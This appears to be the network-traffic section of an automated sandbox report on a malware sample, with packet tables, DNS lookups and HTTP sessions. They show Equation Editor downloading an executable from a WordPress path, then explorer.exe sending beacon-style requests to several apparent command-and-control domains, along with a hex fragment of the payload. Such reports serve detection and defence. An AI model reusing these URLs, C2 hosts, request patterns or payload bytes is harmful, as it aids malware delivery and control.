                                Nov 14, 2023 13:28:02.993865013 CET804916691.195.240.19192.168.2.22
                                Nov 14, 2023 13:28:02.993876934 CET804916691.195.240.19192.168.2.22
                                Nov 14, 2023 13:28:02.993880033 CET4916680192.168.2.2291.195.240.19
                                Nov 14, 2023 13:28:02.993880033 CET4916680192.168.2.2291.195.240.19
                                Nov 14, 2023 13:28:02.993889093 CET804916691.195.240.19192.168.2.22
                                Nov 14, 2023 13:28:02.993923903 CET4916680192.168.2.2291.195.240.19
                                Nov 14, 2023 13:28:02.993978024 CET4916680192.168.2.2291.195.240.19
                                Nov 14, 2023 13:28:02.994016886 CET4916680192.168.2.2291.195.240.19
                                Nov 14, 2023 13:28:03.300403118 CET804916691.195.240.19192.168.2.22
                                Nov 14, 2023 13:28:23.604310036 CET4916780192.168.2.2238.11.36.68
                                Nov 14, 2023 13:28:23.777333021 CET804916738.11.36.68192.168.2.22
                                Nov 14, 2023 13:28:23.777555943 CET4916780192.168.2.2238.11.36.68
                                Nov 14, 2023 13:28:23.777817965 CET4916780192.168.2.2238.11.36.68
                                Nov 14, 2023 13:28:23.949883938 CET804916738.11.36.68192.168.2.22
                                Nov 14, 2023 13:28:23.950438976 CET804916738.11.36.68192.168.2.22
                                Nov 14, 2023 13:28:23.950762033 CET4916780192.168.2.2238.11.36.68
                                Nov 14, 2023 13:28:23.950858116 CET4916780192.168.2.2238.11.36.68
                                Nov 14, 2023 13:28:24.122905016 CET804916738.11.36.68192.168.2.22
                                Nov 14, 2023 13:28:45.013690948 CET4916880192.168.2.223.33.130.190
                                Nov 14, 2023 13:28:45.165218115 CET80491683.33.130.190192.168.2.22
                                Nov 14, 2023 13:28:45.165352106 CET4916880192.168.2.223.33.130.190
                                Nov 14, 2023 13:28:45.165462017 CET4916880192.168.2.223.33.130.190
                                Nov 14, 2023 13:28:45.316684008 CET80491683.33.130.190192.168.2.22
                                Nov 14, 2023 13:28:45.382431030 CET80491683.33.130.190192.168.2.22
                                Nov 14, 2023 13:28:45.382482052 CET80491683.33.130.190192.168.2.22
                                Nov 14, 2023 13:28:45.382580996 CET4916880192.168.2.223.33.130.190
                                Nov 14, 2023 13:28:45.382627964 CET4916880192.168.2.223.33.130.190
                                Nov 14, 2023 13:28:45.396579981 CET80491683.33.130.190192.168.2.22
                                Nov 14, 2023 13:28:45.396661997 CET4916880192.168.2.223.33.130.190
                                Nov 14, 2023 13:28:45.534183025 CET80491683.33.130.190192.168.2.22
                                Nov 14, 2023 13:29:05.731285095 CET4916980192.168.2.2234.149.87.45
                                Nov 14, 2023 13:29:05.883409023 CET804916934.149.87.45192.168.2.22
                                Nov 14, 2023 13:29:05.883658886 CET4916980192.168.2.2234.149.87.45
                                Nov 14, 2023 13:29:05.883658886 CET4916980192.168.2.2234.149.87.45
                                Nov 14, 2023 13:29:06.035727978 CET804916934.149.87.45192.168.2.22
                                Nov 14, 2023 13:29:06.066524982 CET804916934.149.87.45192.168.2.22
                                Nov 14, 2023 13:29:06.066560030 CET804916934.149.87.45192.168.2.22
                                Nov 14, 2023 13:29:06.066716909 CET4916980192.168.2.2234.149.87.45
                                Nov 14, 2023 13:29:06.066764116 CET4916980192.168.2.2234.149.87.45
                                Nov 14, 2023 13:29:06.218295097 CET804916934.149.87.45192.168.2.22
                                Nov 14, 2023 13:29:44.455823898 CET4917080192.168.2.22206.188.193.211
                                Nov 14, 2023 13:29:47.458198071 CET4917080192.168.2.22206.188.193.211
                                Nov 14, 2023 13:29:47.675571918 CET8049170206.188.193.211192.168.2.22
                                Nov 14, 2023 13:29:47.675832987 CET4917080192.168.2.22206.188.193.211
                                Nov 14, 2023 13:29:47.675930977 CET4917080192.168.2.22206.188.193.211
                                Nov 14, 2023 13:29:50.687489986 CET4917080192.168.2.22206.188.193.211
                                Nov 14, 2023 13:29:53.008421898 CET4917080192.168.2.22206.188.193.211

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Nov 14, 2023 13:26:23.654068947 CET5789353192.168.2.228.8.8.8
                                Nov 14, 2023 13:26:23.819900990 CET53578938.8.8.8192.168.2.22
                                Nov 14, 2023 13:27:01.154933929 CET5482153192.168.2.228.8.8.8
                                Nov 14, 2023 13:27:01.361637115 CET53548218.8.8.8192.168.2.22
                                Nov 14, 2023 13:27:21.881318092 CET5471953192.168.2.228.8.8.8
                                Nov 14, 2023 13:27:22.065354109 CET53547198.8.8.8192.168.2.22
                                Nov 14, 2023 13:28:01.827485085 CET4988153192.168.2.228.8.8.8
                                Nov 14, 2023 13:28:02.012876034 CET53498818.8.8.8192.168.2.22
                                Nov 14, 2023 13:28:23.203567028 CET5499853192.168.2.228.8.8.8
                                Nov 14, 2023 13:28:23.603432894 CET53549988.8.8.8192.168.2.22
                                Nov 14, 2023 13:28:44.835366964 CET5278153192.168.2.228.8.8.8
                                Nov 14, 2023 13:28:45.006840944 CET53527818.8.8.8192.168.2.22
                                Nov 14, 2023 13:29:05.508264065 CET6392653192.168.2.228.8.8.8
                                Nov 14, 2023 13:29:05.729218960 CET53639268.8.8.8192.168.2.22
                                Nov 14, 2023 13:29:23.881514072 CET6551053192.168.2.228.8.8.8
                                Nov 14, 2023 13:29:24.058892965 CET53655108.8.8.8192.168.2.22
                                Nov 14, 2023 13:29:44.198112011 CET6267253192.168.2.228.8.8.8
                                Nov 14, 2023 13:29:44.450772047 CET53626728.8.8.8192.168.2.22

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 14, 2023 13:26:23.654068947 CET192.168.2.228.8.8.80xf2c1Standard query (0)mail.treeoflifeadventures.comA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:27:01.154933929 CET192.168.2.228.8.8.80x622aStandard query (0)www.narrativepages.comA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:27:21.881318092 CET192.168.2.228.8.8.80xa59fStandard query (0)www.credit-cards-16215.bondA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:28:01.827485085 CET192.168.2.228.8.8.80xebecStandard query (0)www.luxpsy.comA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:28:23.203567028 CET192.168.2.228.8.8.80x15a2Standard query (0)www.sxchenggu.comA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:28:44.835366964 CET192.168.2.228.8.8.80xc2c0Standard query (0)www.centralngs.comA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:29:05.508264065 CET192.168.2.228.8.8.80xb8eStandard query (0)www.west-paws.comA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:29:23.881514072 CET192.168.2.228.8.8.80xe8fbStandard query (0)www.pj69vip12.cyouA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:29:44.198112011 CET192.168.2.228.8.8.80xbbcbStandard query (0)www.miamirealestatecommercial.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 14, 2023 13:26:00.929542065 CET8.8.8.8192.168.2.220x9680No error (0)windowsupdatebg.s.llnwi.net69.164.40.8A (IP address)IN (0x0001)false
                                Nov 14, 2023 13:26:23.819900990 CET8.8.8.8192.168.2.220xf2c1No error (0)mail.treeoflifeadventures.com41.185.64.155A (IP address)IN (0x0001)false
                                Nov 14, 2023 13:27:01.361637115 CET8.8.8.8192.168.2.220x622aNo error (0)www.narrativepages.com103.224.212.212A (IP address)IN (0x0001)false
                                Nov 14, 2023 13:27:22.065354109 CET8.8.8.8192.168.2.220xa59fName error (3)www.credit-cards-16215.bondnonenoneA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:28:02.012876034 CET8.8.8.8192.168.2.220xebecNo error (0)www.luxpsy.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                Nov 14, 2023 13:28:02.012876034 CET8.8.8.8192.168.2.220xebecNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                Nov 14, 2023 13:28:23.603432894 CET8.8.8.8192.168.2.220x15a2No error (0)www.sxchenggu.com38.11.36.68A (IP address)IN (0x0001)false
                                Nov 14, 2023 13:28:45.006840944 CET8.8.8.8192.168.2.220xc2c0No error (0)www.centralngs.comcentralngs.comCNAME (Canonical name)IN (0x0001)false
                                Nov 14, 2023 13:28:45.006840944 CET8.8.8.8192.168.2.220xc2c0No error (0)centralngs.com3.33.130.190A (IP address)IN (0x0001)false
                                Nov 14, 2023 13:28:45.006840944 CET8.8.8.8192.168.2.220xc2c0No error (0)centralngs.com15.197.148.33A (IP address)IN (0x0001)false
                                Nov 14, 2023 13:29:05.729218960 CET8.8.8.8192.168.2.220xb8eNo error (0)www.west-paws.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                Nov 14, 2023 13:29:05.729218960 CET8.8.8.8192.168.2.220xb8eNo error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                Nov 14, 2023 13:29:05.729218960 CET8.8.8.8192.168.2.220xb8eNo error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                Nov 14, 2023 13:29:24.058892965 CET8.8.8.8192.168.2.220xe8fbName error (3)www.pj69vip12.cyounonenoneA (IP address)IN (0x0001)false
                                Nov 14, 2023 13:29:44.450772047 CET8.8.8.8192.168.2.220xbbcbNo error (0)www.miamirealestatecommercial.com206.188.193.211A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • mail.treeoflifeadventures.com
                                • www.narrativepages.com
                                • www.luxpsy.com
                                • www.sxchenggu.com
                                • www.centralngs.com
                                • www.west-paws.com
                                • www.miamirealestatecommercial.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.224916241.185.64.15580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                TimestampkBytes transferredDirectionData
                                Nov 14, 2023 13:26:24.263209105 CET2OUTGET /wp-content/plugins/70d5e28f51c1438d94e3e6dc84b95311/xt/mmd/shell/jakatrol2.1.exe HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: mail.treeoflifeadventures.com
                                Connection: Keep-Alive
                                Nov 14, 2023 13:26:24.701302052 CET3INHTTP/1.1 200 OK
                                Date: Tue, 14 Nov 2023 12:26:24 GMT
                                Server: Apache
                                Last-Modified: Tue, 14 Nov 2023 03:41:46 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding,User-Agent
                                Content-Encoding: gzip
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Transfer-Encoding: chunked
                                Content-Type: application/x-msdownload
                                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 79 3c 94 df fb 38 8e df b3 60 ac 33 8a 52 28 8a 52 22 85 22 a9 b1 8c b4 a8 11 86 4a a2 d0 98 64 9d 89 ca da 50 c6 a4 7d df 45 cb b3 7d 4f 1b 63 09 95 a2 5d a5 08 e5 d6 a8 88 6c c9 fc ae 73 cf a8 e7 eb fd f9 bc be df ef 1f bf ed 8f 8f 47 67 ee b3 9f eb 5c e7 5a cf 39 f7 9d c7 e2 6d 18 05 c3 30 2a 04 99 0c c3 f2 30 f9 1f 13 fb bf ff 2b 87 a0 35 f2 b6 16 76 4d f5 b1 71 1e 69 de 63 63 6f 6e 58 ac 51 54 4c e4 ca 98 a0 d5 46 2b 82 22 22 22 f9 46 cb 43 8c 62 04 11 46 61 11 46 ae 0b bc 8c 56 47 06 87 58 6a 6a aa 99 28 fa 38 6f 65 96 da ec e9 f6 6c 20 8c 0f 18 f6 4c 4a c4 67 3d 8b 26 d2 fa cf 3e c3 f3 5e cc 9a 67 0d f0 b4 f4 65 3e c3 e1 b9 30 6c 05 17 d5 1f 80 85 cd c2 b0 79 24 25 2c 64 9a 8c 33 90 57 87 d1 49 ea 24 65 0c f3 87 c4 2b 12 31 c9 5f 56 10 67 40 88 52 cc 12 c5 c9 f2 f9 2b 2b f0 40 fc 5d a2 fc 49 40 71 0a 51 11 d5 fd f3 fc f3 20 fe f4 f8 18 76 0c 45 aa c8 18 e3 e9 ff 03 e4 fd 3f fd 03 38 13 c8 ff bd d8 92 1f 12 0f 43 63 d2 c5 0a 80 d0 5c a9 ff 59 c7 08 c3 02 2d 63 82 83 f8 41 18 b6 47 5b de 27 36 08 42 e0 7f d6 63 c2 3f 4b 79 35 cc ee 12 e0 6b 1b 26 47 4a cc ff 52 4f 62 19 a1 a8 98 02 81 fd bf 07 30 05 d5 8b 89 8d 59 81 40 43 38 01 dc 60 68 c5 e2 ff d7 71 ff fb 0c ff cf df ff 27 ff 7c c4 2d c2 16 7f 61 a2 06 9d 6f 0e bf 6e 62 96 8e 40 53 e8 ae c7 10 6b ba cf 74 c6 44 ee 54 b6 4c c0 90 09 34 64 02 9a 4c b7 23 9a 89 35 3b 03 65 78 71 c4 b6 6c 28 cf 62 e5 fa b2 89 a2 6e 28 12 86 74 60 22 96 46 16 ab 51 9e d7 07 79 e2 c4 56 61 48 2b 26 36 64 47 41 db 14 18 92 7e c3 6d 21 fd 06 87 43 bf e8 83 8b 2b cd 3d 70 fa c5 42 4a 91 c8 83 b1 bf 4b 66 fd 2c b3 15 ca 3d 21 8b 7e 63 be 0f fd a2 07 4e 29 14 3f 84 12 68 e1 8d 5a 64 96 43 39 9b 7e 91 c5 a0 14 41 76 e1 47 1a fd 86 44 bd 3c 8b d5 c1 16 79 74 cb 74 fd 60 18 21 ab 95 2a 62 e9 b0 e5 80 68 c8 74 b1 18 26 26 13 e8 c8 9e 0b 59 38 d5 3e 11 a7 6f 8e 93 c9 64 c2 24 3f 19 3f 44 b6 c6 46 a6 eb 0e ad d2 25 d0 86 ef 23 4e d4 e0 91 7c cb 58 8d 0c 80 b5 8c 85 d3 e0 21 d3 75 85 0a b2 35 7e be 32 dd 79 51 44 5f 62 5b 26 44 7c 65 af e4 13 e6 1a 41 3d 36 4f c6 65 4e 75 86 5c 5d 2a 31 a2 06 94 13 e3 02 9e e4 28 61 43 fe b2 00 6b c9 92 07 45 0c 4c 3c cf 84 9a cd 05 34 8a 9f 7a 85 3d d3 03 b6 e5 f8 8a bd c9 b4 ce 22 32 7f 41 56 34 c9 5a e6 60 1b 0e c5 b1 ce e2 27 61 0f 50 79 96 2b 89 26 a6 75 16 92 f9 94 59 d2 11 9d 85 54 be aa b8 72 41 fa 03 be 91 94 d1 59 c8 10 a8 8b df 58 bf 15 36 90 ac df 88 f4 dc 94 50 0b 79 0f 31 0f 97 05 2c 29 a2 a2 e5 f6 f4 14 fb d0 60 fd 7e 84 75 a2 72 b1 21 02 c0 fa 01 a5 dd 57 e4 d1 07 28 14 bb d1 4e 93 f9 ea f6 1e 1a 7c 65 93 7c 67 91 1b cd 41 97 00 c2 55 5c 14 26 21 80 48 d0 a3 65 39 93 c4 74 04 87 1a 8f b4 10 3f 01 d8 44 49 aa c0 ac b3 90 c9 a7 c8 58 7d 9d 85 24 be 12 3c a5 90 e8 76 50 42 3d 88 ab 62 ee 5a 4b 00 90 07 45 34 4c 98 d8 87 f1 db 85 89 dd 18 5f 59 38 9f c6 94 36 89 e7 d3 52 3e 26 0b 1f 90 44 f3 69 d2 37 7f 70 c3 b1 ee 14
                                Data Ascii: 1faay<8`3R(R""JdP}E}Oc]lsGg\Z9m0*0+5vMqicconXQTLF+"""FCbFaFVGXjj(8oel LJg=&>^ge>0ly$%,d3WI$e+1_Vg@R++@]I@qQ vE?8Cc\Y-cAG['6Bc?Ky5k&GJROb0Y@C8`hq'|-aonb@SktDTL4dL#5;exql(bn(t`"FQyVaH+&6dGA~m!C+=pBJKf,=!~cN)?hZdC9~AvGD<ytt`!*bht&&Y8>od$??DF%#N|X!u5~2yQD_b[&D|eA=6OeNu\]*1(aCkEL<4z="2AV4Z`'aPy+&uYTrAYX6Py1,)`~ur!W(N|e|gAU\&!He9t?DIX}$<vPB=bZKE4L_Y86R>&Di7p
                                Nov 14, 2023 13:26:24.701364994 CET5INData Raw: f6 18 c5 da d8 13 13 59 33 21 8b 4d f3 15 93 4f 2b 0b 06 59 cb 66 3d 6f 4a 5f d7 c7 a7 6a 90 a4 64 93 7e 11 d9 2d b5 e8 5f 73 7e b3 2c 40 3e 65 61 8b 46 36 a2 56 61 48 1f 50 ae d2 2e 58 51 5f b1 23 aa 23 62 75 8b 59 dd d6 ef ec f5 f8 73 1d 6a 63
                                Data Ascii: Y3!MO+Yf=oJ_jd~-_s~,@>eaF6VaHP.XQ_##buYsjcYb[4&Y,0hp>/0u}HZJ\SPyYTQQ13P%[+S3/E08bM5UJg^Gp2A$]"2*'VBa
                                Nov 14, 2023 13:26:24.701405048 CET6INData Raw: 34 1f 00 12 e6 91 f1 6b 88 49 29 68 d5 cf a0 18 09 e8 3d 9f 41 10 b7 88 55 95 31 82 af 0a 48 a7 a7 31 e9 a8 dd 78 68 e7 f0 0b 16 b9 9b 9e 61 09 39 0e dd 49 64 31 e8 a4 2a 4a 19 50 55 27 e2 ef 44 1a 4c 31 4d 1b 0a 13 e9 1c bc 07 b2 28 dd 6b 95 44
                                Data Ascii: 4kI)h=AU1H1xha9Id1*JPU'DL1M(kDKi_2D0-g-l4$Y8#$=MP $W-dtC/nP&H-<y{%Qb_#2pk!~,&0Z4ZCk,Mjlzk6YxmPD([-3I(=
                                Nov 14, 2023 13:26:24.701446056 CET7INData Raw: 15 9e 31 be 0b f2 90 65 c7 c5 63 99 80 00 2f 6e 77 2c 22 7f 7e 0c c1 87 9b df 62 08 8f b4 2c 9f ee 85 5c 1a 1f a6 4a 63 cb b4 d1 fc e9 9b af c8 8b 38 6c 31 4d e6 c9 46 4a 94 46 90 33 91 36 11 7b e0 f9 32 54 a3 b0 b0 9b 36 ba 94 af 29 f6 a0 b1 3d
                                Data Ascii: 1ec/nw,"~b,\Jc8l1MFJF36{2T6)=00Y`?4#@*x97p01<~X5M#CuQ4ynn!"/<aY(@4w4tw^`<*AjP[:p
                                Nov 14, 2023 13:26:24.701483011 CET9INData Raw: 6b 6c 14 d0 85 a5 7a 1c 5f fc 22 b0 41 73 15 f4 e1 29 e5 0b 1f c8 cc cb 45 1e 75 7c 0d 60 02 35 32 1a be 46 ca 90 09 f0 2c 37 3d 36 7e 0a 6a a6 cc 57 25 21 9f c7 a3 46 a4 b1 11 69 ff b4 dd 72 23 0c 9f d7 0c 4a 29 03 43 d6 5f 15 09 61 d5 88 2e 9c
                                Data Ascii: klz_"As)Eu|`52F,7=6~jW%!Fir#J)C_a.x?1~ PUAbROTeXm17o@;iMGTbc0HMvrO'|0Hb[=0cbt!7!<B+Ll7<0~b!}LlO?X7L
                                Nov 14, 2023 13:26:24.701525927 CET10INData Raw: a8 95 8f 31 c1 54 13 e8 24 82 a9 a4 53 50 87 76 ee 7c 71 8e a2 c3 1e 40 c5 38 81 8e c8 91 8b 3a b1 0d bf 84 e0 e8 96 77 69 18 05 bf 39 7c 84 ef 47 84 45 22 62 b5 d0 37 9f 46 3e a7 2d 2a 32 6f 97 03 d0 49 6c 79 93 c4 dd 7c 17 73 56 87 23 ba 45 13
                                Data Ascii: 1T$SPv|q@8:wi9|GE"b7F>-*2oIly|sV#E&&J9L"q'BH8Y5o/hL 3N-&&0uC<^/.Q`&#+wo?l"(e<}%Cp[1@JDh
                                Nov 14, 2023 13:26:24.701565027 CET11INData Raw: 18 f5 e5 05 82 17 9f 0f eb 93 8d 6c 83 7b 88 5e 85 75 46 3e 39 e8 5e 44 99 52 0d 32 b3 30 12 86 37 1a 11 ca 35 1d b1 b7 78 be bb c3 23 fe 3a 31 67 5e 76 3c 94 17 d4 59 02 1c 94 2a 5f 4a f9 42 4f d9 1a 57 fc 11 f0 f5 31 94 39 ad 98 ef 3d 7d 94 80
                                Data Ascii: l{^uF>9^DR2075x#:1g^v<Y*_JBOW19=}^Q8kWkRv}ekpKSq9DqXx(OF"3~An>z$iX>/:'1,Lb zhe"lrp#da`VP9y~H @ '/
                                Nov 14, 2023 13:26:24.701605082 CET13INData Raw: 82 cf 00 20 88 e1 61 42 1a 78 c5 cb 01 3a 10 f8 f3 68 03 c5 84 18 57 42 b4 54 8c d8 66 e4 bf e1 97 d9 22 76 12 59 20 16 80 21 36 23 0b d0 02 6d b2 0a f4 ed 2d 50 35 fe 60 9e 9a af bc 8f 32 25 54 80 58 6f 40 ec 32 c0 57 13 26 98 50 e3 05 ca f2 7b
                                Data Ascii: aBx:hWBTf"vY !6#m-P5`2%TXo@2W&P{F'p0WsCEb^aEUrF<+D{cJM'E7u;;tbe_cd)lk!H&U>;qi"V7_[3n:eR
                                Nov 14, 2023 13:26:24.701642990 CET14INData Raw: 1e 2f 1c ca 63 d1 64 c9 84 e7 87 e4 b1 fd 5a 06 df 8a cd fb 45 dc 4e c1 cf 28 5a 01 8d 57 cb 04 2f 78 7d 1c 1c bd 01 27 d5 22 76 fa d0 7e 27 7e 49 0b 9d 2f 80 bf 9a d3 88 8c 3c 35 9e 0a 1e fd 04 ec 62 74 cd a2 31 3d 4a 87 4f 11 25 f6 81 10 4b ec
                                Data Ascii: /cdZEN(ZW/x}'"v~'~I/<5bt1=JO%K%hJ>dEzHNx1TH+.tCT$,zK }<I&m/hI,:2|Nj?zEq4V~d@/J amjHs]2
                                Nov 14, 2023 13:26:24.701680899 CET16INData Raw: bc a3 d9 48 bc 08 0a 92 ce aa 95 38 f3 a4 6f 39 84 7c 68 3f f4 6a 89 d8 a3 43 4c cd 00 b0 f9 62 75 30 8f 3a ef 93 ca 58 77 d1 3b bb 7c ed 2c 17 06 c4 55 09 7e ac 48 59 41 ea 47 d4 a1 c4 a3 f8 49 b5 c4 85 60 df 03 b5 30 f8 14 a1 84 22 7e 2a 13 48
                                Data Ascii: H8o9|h?jCLbu0:Xw;|,U~HYAGI`0"~*H4"%DXo$HR/rJ<bGA:W{KJUqG&cdAp-S>?c$W4~aE+~^lrz%N`0a$H"/hNF>m
                                Nov 14, 2023 13:26:25.127831936 CET17INData Raw: 84 8e e8 c8 11 e3 2b 15 e2 ba 82 59 42 47 9c 48 29 a7 b6 61 98 9e fc 23 02 dc 3a f0 da 72 1a e1 27 9b 38 3d c5 b7 13 c7 54 b4 9c 96 ed 68 33 ba 15 7e d1 4e bf 48 b3 03 79 77 ba 2f e4 63 10 77 4a dd 49 c4 67 33 12 69 be f8 41 32 92 f5 1a c4 de ed
                                Data Ascii: +YBGH)a#:r'8=Th3~NHyw/cwJIg3iA2P_%E%]9Ra5m6dz1%De;&f'T8)@x#XJ#.Sj\n'.JoDdg]GuhVq|JOa)t#I$2x_Pk


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.2249164103.224.212.21280C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 14, 2023 13:27:01.556895971 CET403OUTGET /ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41 HTTP/1.1
                                Host: www.narrativepages.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 14, 2023 13:27:01.751121998 CET404INHTTP/1.1 302 Found
                                date: Tue, 14 Nov 2023 12:27:01 GMT
                                server: Apache
                                set-cookie: __tad=1699964821.5890023; expires=Fri, 11-Nov-2033 12:27:01 GMT; Max-Age=315360000
                                location: http://ww25.narrativepages.com/ge06/?6l58L2=/ya+08xkyOEL3z3mbFI+CcZs6Ll5ZIz+eS70dlN8tW9HOdaiVOhFBqrIR4wo06Sw4yKSnA==&BL3=KP-PB41&subid1=20231114-2327-010e-8293-af04c239490a
                                content-length: 2
                                content-type: text/html; charset=UTF-8
                                connection: close
                                Data Raw: 0a 0a
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.224916691.195.240.1980C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Nov 14, 2023 13:28:02.320327997 CET405OUTGET /ge06/?6l58L2=rR7wD3U/ZV6dBjvSlK9KatPYfQs2u0cQXMzY4PO5wsCIJRW7frAjgDUNgmxBJMGJ1YneTQ==&BL3=KP-PB41 HTTP/1.1
                                Host: www.luxpsy.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Nov 14, 2023 13:28:02.687213898 CET407INHTTP/1.1 200 OK
                                date: Tue, 14 Nov 2023 12:28:02 GMT
                                content-type: text/html; charset=UTF-8
                                transfer-encoding: chunked
                                vary: Accept-Encoding
                                x-powered-by: PHP/8.1.17
                                expires: Mon, 26 Jul 1997 05:00:00 GMT
                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                pragma: no-cache
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EfqE9+XgsPeY0lt8fmJCcevpQEArfAW6hkYNc948X7A9WnL7z7gTBDJenGdvd81ElZXhQnPSPvnXhX6qVpD73g==
                                last-modified: Tue, 14 Nov 2023 12:28:02 GMT
                                x-cache-miss-from: parking-698fb476bf-mbx66
                                server: NginX
                                connection: close
                                Data Raw: 32 43 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 45 66 71 45 39 2b 58 67 73 50 65 59 30 6c 74 38 66 6d 4a 43 63 65 76 70 51 45 41 72 66 41 57 36 68 6b 59 4e 63 39 34 38 58 37 41 39 57 6e 4c 37 7a 37 67 54 42 44 4a 65 6e 47 64 76 64 38 31 45 6c 5a 58 68 51 6e 50 53 50 76 6e 58 68 58 36 71 56 70 44 37 33 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 6c 75 78 70 73 79 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 6c 75 78 70 73 79 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6c 75 78 70 73 79 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20
                                Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_EfqE9+XgsPeY0lt8fmJCcevpQEArfAW6hkYNc948X7A9WnL7z7gTBDJenGdvd81ElZXhQnPSPvnXhX6qVpD73g==><head><meta charset="utf-8"><title>luxpsy.com&nbsp;-&nbsp;luxpsy Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="luxpsy.com is your first and best source for all of the information youre looking for. From general topics
                                Nov 14, 2023 13:28:02.687242031 CET408INData Raw: 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 6c 75 78 70 73 79 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c 2e 20 57 65 20 68 6f 70 65 20 79 6f 75 20
